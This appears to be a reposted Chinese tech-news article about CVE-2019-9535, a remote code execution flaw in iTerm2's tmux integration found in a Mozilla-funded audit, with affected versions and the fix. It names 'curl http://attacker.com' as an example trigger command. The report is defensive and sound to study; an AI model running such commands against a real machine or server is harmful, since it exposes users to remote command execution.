首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >MacOS 终端利器 iTerm 2 曝严重安全漏洞,至少存在 7 年(含 PoC 视频)

MacOS 终端利器 iTerm 2 曝严重安全漏洞,至少存在 7 年(含 PoC 视频)

作者头像
iMike
发布2019-10-15 23:11:24
发布2019-10-15 23:11:24
7350
举报
文章被收录于专栏:运维之美运维之美

近日,由 Mozilla 开源支持计划 (MOSS) 资助、网络安全公司 Radically Open Security (ROS) 开展的一次独立安全审计结果显示,iTerm 2 中存在一个严重的远程代码执行 (RCE) 漏洞,且至少已存在 7 年。

iTerm 2 简介

iTerm 2 是非常流行的 MacOS 平台下的终端工具,被许多开发者与系统管理员广泛使用。iTerm 2 是 MacOS 内置终端工具最有力的热门开源工具替代品之一,被很多开发人员称为 MacOS 的终端利器。

iTerm 2 漏洞概述

据了解,ROS 发现 iTerm 2 中的 Tmux 集成功能有严重的安全漏洞,该漏洞目前分配到的编号为 CVE-2019-9535

Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

简单来说,在大多数情况下,攻击者可以利用这个漏洞在使用者电脑上远程执行命令。这个漏洞需要与用户进行一定程度的互动,然后攻击者才能进行后续的攻击行动。 但是由于攻击者可以通过一些被认为是安全的命令利用,例如:curl http://attacker.com 或者 tail -f /var/log/apache2/referer_log,因此被认为有高度的潜在安全影响。

ROS 提供了攻击的 Demo 视频,该视频模拟受害者机器连接到恶意 SSH 服务器之后,在机器上执行命令的 PoC

iTerm 2 漏洞影响的版本

该漏洞将影响 iTerm 2 3.3.5 版本及之前所有版本,可能影响的 iTerm 2 用户数量介于 10 万至 20 万之间。

iTerm 2 漏洞修复方案

现在 MozillaROSiTerm 2 开发者密切合作,推出了最新 3.3.6 版本,而 3.3.5 的安全修补程序也已经发布。

Mozilla 表示,虽然 iTerm 2 软件会主动提示更新,但是希望开发者能主动更新到 3.3.6 或 3.3.7 beta1,减少可能被攻击的机会。

参考文档

  1. https://www.google.com
  2. https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/
  3. https://www.theregister.co.uk/2019/10/10/iterm2_flaw_moss/

你可能还喜欢

点击下方图片即可阅读

Teamviewer 曝重大安全漏洞,攻击者可任意控制用户或属乌龙事件!(内附安全处理建议)

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-10-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 奇妙的Linux世界 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • iTerm 2 简介
  • iTerm 2 漏洞概述
  • iTerm 2 漏洞影响的版本
  • iTerm 2 漏洞修复方案
  • 参考文档
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档